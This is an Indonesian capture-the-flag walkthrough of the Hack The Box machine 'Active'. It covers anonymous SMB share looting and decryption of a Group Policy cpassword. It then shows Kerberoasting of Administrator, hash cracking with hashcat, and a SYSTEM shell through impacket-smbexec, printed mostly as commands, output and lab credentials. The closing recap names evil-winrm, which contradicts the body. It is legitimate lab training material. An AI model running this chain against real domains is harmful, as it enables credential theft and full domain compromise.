Active

Information Gathering

NMAP - Ports and Services

Nmap scan report for 10.10.10.100 (10.10.10.100)
Host is up (0.065s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-01-08 16:20:03Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
49166/tcp open  msrpc         Microsoft Windows RPC
49167/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.70 seconds

Road to Users

SMB - Null Session

┌──(me㉿justakazh)-[~/ctf/active]
└─$ smbclient -L \\active.htb -N                                        
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Replication     Disk      
        SYSVOL          Disk      Logon server share 
        Users           Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to active.htb failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

smb mengizinkan null session yang dimana kita bisa enumerasi folder yang tersedia, disini folder Replication terlihat menarik. mari kita download seluruh isinya ke local

┌──(me㉿justakazh)-[~/ctf/active]
└─$ smbclient \\\\active.htb\\Replication -N
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> mask ""
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI of size 119 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI (0.5 KiloBytes/sec) (average 0.3 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol (13.1 KiloBytes/sec) (average 3.5 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml (2.7 KiloBytes/sec) (average 3.3 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (4.7 KiloBytes/sec) (average 3.6 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 3722 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (17.6 KiloBytes/sec) (average 5.6 KiloBytes/sec)
smb: \>

disini terdapat file Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml yang menyimpan password

┌──(me㉿justakazh)-[~/ctf/active/active.htb]
└─$ grep -Rina password                            
Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml:2:<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>

mari kita descript passwordnya

┌──(me㉿justakazh)-[~/ctf/active/active.htb]
└─$ gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
GPPstillStandingStrong2k18

mari kita verifikasi bahwa user tersebut valid

                                                                                                                                                                                                                                            
┌──(me㉿justakazh)-[~/ctf/active/active.htb]
└─$ nxc smb active.htb -u "SVC_TGS" -p 'GPPstillStandingStrong2k18'
SMB         10.10.10.100    445    DC               [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.100    445    DC               [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18

Road to Administrator

saya melakukan enumerasi dengan bloodhound-python

bloodhound-python -u "SVC_TGS" -p 'GPPstillStandingStrong2k18' -c all -d active.htb -ns 10.10.10.100

pada bloodhound svc_tgs memiliki GenericAll privilege pada domain admins group sehingga kita bisa menggunakan targetedKerberoastuntuk mendapatkan administrator hash

┌──(me㉿justakazh)-[~/ctf/active/bloodhound-collect]
└─$ ~/tools/ad/targetedKerberoast/targetedKerberoast.py -v -d 'active.htb' -u 'svc_tgs' -p 'GPPstillStandingStrong2k18'

[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[+] Printing hash for (Administrator)
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$21442726954488bc416be9bbb92ac773$18ff8d7a08901da3ed67ae47e786888967f6d8f42609ff9106ea9fcadb66eb8b99c009be8100e51b909ee4955ab70bbd6d02ab47833d5784df30cd6de533b832a71abcc517266f6763aa8d22761325aa4b8c6de874909d6728a63eb27d0b9f4faf88b37a8fe3ff49ebb50de0aef4c4fcadcdad49fef823eb0d43728bdb8ec399d81afd797c925035beed47aca6f2687811ceeb95ca6f7f2cb9fa61c27891cab0594156c7f7050a5036443a3d2682ea4a38efedb8ef9a038284b2088b9f46da10852ecac0591bcdca8bc0f1ed93e0e30184f679dcfaca11d979b5ea8c4e20765958a8c76fb13b98d91d082d4f754540bf00dae9d84e6557c3332646d6557e4520c6f9ee67627fc07343741de361199e4ee8ae95acd9078327f9b051eeeb74c5627ed0930cdc154dc7f6601df60d7caf1b9a492ee5579f9305ac6519722e23284a1f52b084df0b589fe8946fc9a136134149bcb5a42ea4af56fc13c337d0c8a73dfc7e7ed6f868b1d7ff7d3895bf0f296ef7ca1aa7e57b13b05fdaef637b6407453b6625d954dbccc8462695fd0559e1cb4d9185e81f49f7eeb4bbf6c2a304059de289f4f2f9f60c5d6c29d026acf0ef8b27a36724f3472c1af3e3bc4ad205d91bde9b5ff291602ce2a33f58279641469b46fbf5b6b92440ee7ed9de0f936186a8fe7a6c8801097d5ca0eb96c422063ebcb4b924f20c22e782772b5232fcc4cdeebca53fad805d51a74c7c13d2cfb78579f6f608b0620967be698721dd3baaa30b2823cccab10e0d9bfef8d12bf1ec1ff5f5f573d103c1152105c2e0416b55e01f39e13d10ca6f9eeda5e666d13aa9040c42b8ab9584520c09d62055c711efa653699b2f2a2041a574bf2aba87117dd5c8228e199c94650b96061830e8381e177ba79751a38d35c3e74de47aca7a40be151c445fc0b9553e2be8b4a431d5db474284d596112c586adb02aecf4229fc5b43812b30dedb3bec329f743a6d8f57dbc28cb3ed5a9b88dbc788e0cb1b8bc5f86db9daf1496eb8b86a231bf31205a710a9f5bc66bf62ff89200df02b6977b8a7eebbac89ba79ecf6aa40ff931758d068c2c78877b8aa54a34c6b6ad753ad426e8804e3567b85e8b049b9ac5871bcd857c8392ba53117b562526fef3aba6315b3e9d704daf105cef04eb5304751ff433b7fabaa12f6cad8ee8518e502f74c6d48d0e5efbefbb3d4869a34b2c591f91ce0f3a1c4ed419516d3307d935c594aa78526dc0713542713cbacd731

selanjutnya simpan hash tersebut ke administrator.hash dan crack menggunakan hashcat

┌──(me㉿justakazh)-[~/ctf/active/bloodhound-collect]
└─$ hashcat kerberoas.hash /usr/share/wordlists/rockyou.txt 
[---SNIP---]
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$21442726954488bc416be9bbb92ac773$18ff8d7a08901da3ed67ae47e786888967f6d8f42609ff9106ea9fcadb66eb8b99c009be8100e51b909ee4955ab70bbd6d02ab47833d5784df30cd6de533b832a71abcc517266f6763aa8d22761325aa4b8c6de874909d6728a63eb27d0b9f4faf88b37a8fe3ff49ebb50de0aef4c4fcadcdad49fef823eb0d43728bdb8ec399d81afd797c925035beed47aca6f2687811ceeb95ca6f7f2cb9fa61c27891cab0594156c7f7050a5036443a3d2682ea4a38efedb8ef9a038284b2088b9f46da10852ecac0591bcdca8bc0f1ed93e0e30184f679dcfaca11d979b5ea8c4e20765958a8c76fb13b98d91d082d4f754540bf00dae9d84e6557c3332646d6557e4520c6f9ee67627fc07343741de361199e4ee8ae95acd9078327f9b051eeeb74c5627ed0930cdc154dc7f6601df60d7caf1b9a492ee5579f9305ac6519722e23284a1f52b084df0b589fe8946fc9a136134149bcb5a42ea4af56fc13c337d0c8a73dfc7e7ed6f868b1d7ff7d3895bf0f296ef7ca1aa7e57b13b05fdaef637b6407453b6625d954dbccc8462695fd0559e1cb4d9185e81f49f7eeb4bbf6c2a304059de289f4f2f9f60c5d6c29d026acf0ef8b27a36724f3472c1af3e3bc4ad205d91bde9b5ff291602ce2a33f58279641469b46fbf5b6b92440ee7ed9de0f936186a8fe7a6c8801097d5ca0eb96c422063ebcb4b924f20c22e782772b5232fcc4cdeebca53fad805d51a74c7c13d2cfb78579f6f608b0620967be698721dd3baaa30b2823cccab10e0d9bfef8d12bf1ec1ff5f5f573d103c1152105c2e0416b55e01f39e13d10ca6f9eeda5e666d13aa9040c42b8ab9584520c09d62055c711efa653699b2f2a2041a574bf2aba87117dd5c8228e199c94650b96061830e8381e177ba79751a38d35c3e74de47aca7a40be151c445fc0b9553e2be8b4a431d5db474284d596112c586adb02aecf4229fc5b43812b30dedb3bec329f743a6d8f57dbc28cb3ed5a9b88dbc788e0cb1b8bc5f86db9daf1496eb8b86a231bf31205a710a9f5bc66bf62ff89200df02b6977b8a7eebbac89ba79ecf6aa40ff931758d068c2c78877b8aa54a34c6b6ad753ad426e8804e3567b85e8b049b9ac5871bcd857c8392ba53117b562526fef3aba6315b3e9d704daf105cef04eb5304751ff433b7fabaa12f6cad8ee8518e502f74c6d48d0e5efbefbb3d4869a34b2c591f91ce0f3a1c4ed419516d3307d935c594aa78526dc0713542713cbacd731:Ticketmaster1968
[---SNIP---]

karena tidak ada winrm, disini saya akan menggunakan impacket-smbexec untuk mendapatkan flag user dan root

┌──(me㉿justakazh)-[~/ctf/active/bloodhound-collect]
└─$ impacket-smbexec active.htb/administrator:[email protected]

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>cd ..
[-] You can't CD under SMBEXEC. Use full paths.
C:\Windows\system32>type C:\users\svc_tgs\desktop\user.txt
bd39b9xxxx76d121bfb0xxxxxxxxxxxx

C:\Windows\system32>type C:\users\administrator\desktop\root.txt
e1096xxx98c8b1b3946exxxxxxxxxxxx

C:\Windows\system32>

Machine Recap

port and service scanning
melakukan smb null session dan mendownload seluruh isi dari folder Replication/ impacket-Get-GPPassword
mendapatkan SVC_TGS GP Password melakukan decrypt password dengan gpp-decrypt
active directory mapping dengan bloodhound
user svc_tgs memiliki genericAll pada domain admins groups
melakukan kerberoasting untuk mendapatkan hash administrator
melakukan cracking hash administrator dengan hashcat
mengakses evil-winrm untuk mendapatkan flag

PreviousSauna NextEscapeTwo

Last updated 10 months ago